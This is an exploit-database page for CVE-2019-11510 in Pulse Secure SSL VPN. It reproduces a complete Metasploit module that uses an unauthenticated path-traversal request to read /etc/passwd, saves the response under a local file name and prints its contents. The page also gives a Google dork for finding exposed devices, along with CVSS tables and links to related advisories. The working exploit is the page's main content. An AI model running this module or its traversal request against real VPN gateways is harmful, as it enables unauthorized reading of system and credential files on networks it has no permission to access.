Lucene search
Alyssa HerreraEXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42HistoryAug 21, 2019 - 12:00 a.m.
Pulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)
2019-08-2100:00:00
Alyssa Herrera
110
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Pulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)
# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 8/20/2019
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: Linux
# CVE : CVE-2019-11510
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Post::File
def initialize(info = {})
super(update_info(info,
'Name' => 'Pulse Secure - System file leak',
'Description' => %q{
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
},
'References' =>
[
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
],
'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
},
))
end
def run()
print_good("Checking target...")
res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)
if res && res.code == 200
print_good("Target is Vulnerable!")
data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
file_local_write(filename, data)
print_good("Parsing file.......")
parse()
else
if(res && res.code == 404)
print_error("Target not Vulnerable")
else
print_error("Ooof, try again...")
end
end
end
def parse()
current_host = datastore['RHOST']
fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
words = 0
while (line = fileObj.gets)
printable_data = line.gsub(/[^[:print:]]/, '.')
array_data = printable_data.scan(/.{1,60}/m)
for ar in array_data
if ar != "............................................................"
print_good(ar)
end
end
#print_good(printable_data)
end
fileObj.close
end
endRelated
checkpoint_advisories
checkpoint_advisories
Pulse Connect Secure File Disclosure (CVE-2019-11510)
2019-09-04 00:00:00
malwarebytes
malwarebytes
CISA sets two week window for patching serious vulnerabilities
2021-11-04 21:23:02
Pulse VPN patched their vulnerability, but businesses are trailing behind
2019-10-18 16:36:36
Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild
2021-04-21 18:12:15
threatpost
threatpost
Feds Hit with Successful Cyberattack, Data Stolen
2020-09-24 20:47:40
Sodinokibi Ransomware Behind Travelex Fiasco: Report
2020-01-07 17:04:09
Pulse Secure VPNs Get Quick Fix for Critical RCE
2021-05-25 14:57:53
nessus
nessus
Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)
2019-08-16 00:00:00
Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path Traversal (CVE-2019-11510)
2019-08-16 00:00:00
Pulse Connect Secure Multiple Vulnerabilities (SA44101)
2019-05-10 00:00:00
hackerone
hackerone
githubexploit
githubexploit
Exploit for Path Traversal in Pulsesecure Pulse Connect Secure
2019-08-27 03:04:19
Exploit for Path Traversal in Pulsesecure Pulse Connect Secure
2019-08-27 09:21:10
Exploit for Path Traversal in Pulsesecure Pulse Connect Secure
2020-07-27 15:06:08
cve
cve
CVE-2019-11510
2019-05-08 17:29:00
ics
ics
Continued Threat Actor Exploitation Post Pulse Secure VPN Patching
2020-10-24 12:00:00
Continued Exploitation of Pulse Secure VPN Vulnerability
2020-04-15 12:00:00
Chinese State-Sponsored Cyber Operations: Observed TTPs
2021-08-20 12:00:00
packetstorm
packetstorm
Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure
2019-08-21 00:00:00
attackerkb
attackerkb
zdt
zdt
cisa_kev
cisa_kev
Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability
2021-11-03 00:00:00
prion
prion
Arbitrary file deletion
2019-05-08 17:29:00
dsquare
dsquare
Pulse Connect Secure File Disclosure
2019-08-27 00:00:00
thn
thn
nuclei
nuclei
Pulse Connect Secure SSL VPN Arbitrary File Read
2020-04-22 06:42:01
exploitdb
exploitdb
rapid7blog
rapid7blog
Active Exploitation of Pulse Connect Secure Zero-Day (CVE-2021-22893)
2021-04-21 20:10:08
kitploit
kitploit
securelist
securelist
Incident Response Analyst Report 2019
2020-08-06 10:00:34
Black Kingdom ransomware
2021-06-17 10:00:41
IT threat evolution Q2 2021
2021-08-12 10:00:37
mssecure
mssecure
cisa
cisa
myhack58
myhack58
impervablog
impervablog
The State of Vulnerabilities in 2019
2020-01-23 08:56:58
cert
cert
Pulse Secure VPN contains multiple vulnerabilities
2019-10-16 00:00:00
qualysblog
qualysblog
mmpc
mmpc
avleonov
avleonov
Joint Advisory AA22-279A and Vulristics
2022-10-21 20:10:13
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related for EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42